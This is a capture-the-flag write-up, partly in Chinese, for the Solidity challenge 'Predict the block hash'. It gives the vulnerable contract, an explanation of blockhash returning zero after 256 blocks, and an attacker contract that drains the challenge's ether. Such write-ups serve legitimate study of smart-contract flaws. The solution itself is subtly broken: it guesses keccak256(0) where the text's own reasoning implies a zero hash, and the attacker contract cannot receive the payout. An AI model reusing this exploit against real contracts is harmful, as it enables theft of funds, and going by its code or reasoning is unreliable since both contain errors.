Predict the block hash

1. 题目

1.1 题目： Guessing an 8-bit number is apparently too easy. This time, you need to predict the entire 256-bit block hash for a future block
1.2 源码：

pragma solidity ^0.4.21;

contract PredictTheBlockHashChallenge {
    address guesser;
    bytes32 guess;
    uint256 settlementBlockNumber;

    function PredictTheBlockHashChallenge() public payable {
        require(msg.value == 1 ether);
    }

    function isComplete() public view returns (bool) {
        return address(this).balance == 0;
    }

    function lockInGuess(bytes32 hash) public payable {
        require(guesser == 0);
        require(msg.value == 1 ether);

        guesser = msg.sender;
        guess = hash;
        settlementBlockNumber = block.number + 1;
    }

    function settle() public {
        require(msg.sender == guesser);
        require(block.number > settlementBlockNumber);

        bytes32 answer = block.blockhash(settlementBlockNumber);

        guesser = 0;
        if (guess == answer) {
            msg.sender.transfer(2 ether);
        }
    }
}

2. 分析

2.1 分析代码可知，该题和上一题差不多，这题要猜测的数是 256位的，即byte32类型
2.2 这题是需要预测下一个块哈希的块号，显然是不可能的，但是官方文档对 block.blockhash 是这样定义和解释的 ![image-20240412145027802](Predict the block hash/image-20240412145027802.png)

具体是什么意思呢，我去网上搜的解释是，他只能得到256个区块内的哈希值，一旦超过256的区块，就无法返回对应的区块哈希，只会返回零—-我的理解是：如果题目中的 answer 是在 block.number = 0 时设置的，当此时的block.number >= 256时，再去计算 block.blockhash(settlementBlockNumber) 这个值就是 block.blockhash(0) 的值了（settlementBlockNumber = block.number + 1）
2.3 解题思路就是，当我们调用 lockInGuess() 函数，以 0 的hash 作为参数传入该函数中，过一段时间后，再调用 settle() 函数，具体等多久我也不知道

3. 解题

contract Hack {

    PredictTheBlockHashChallenge challenge;

    function Hack(address _challenge) public {
        challenge = PredictTheBlockHashChallenge(_challenge);
    }

    function lockInGuess() public payable {
        challenge.lockInGuess.value(1 ether)(keccak256(0));
    }

    /* 等过了256个区块之后，再调用此函数*/
    function attack() public {
        challenge.settle();
        require(challenge.isComplete(), "not pass");
        tx.origin.transfer(address(this).balance);
    }
}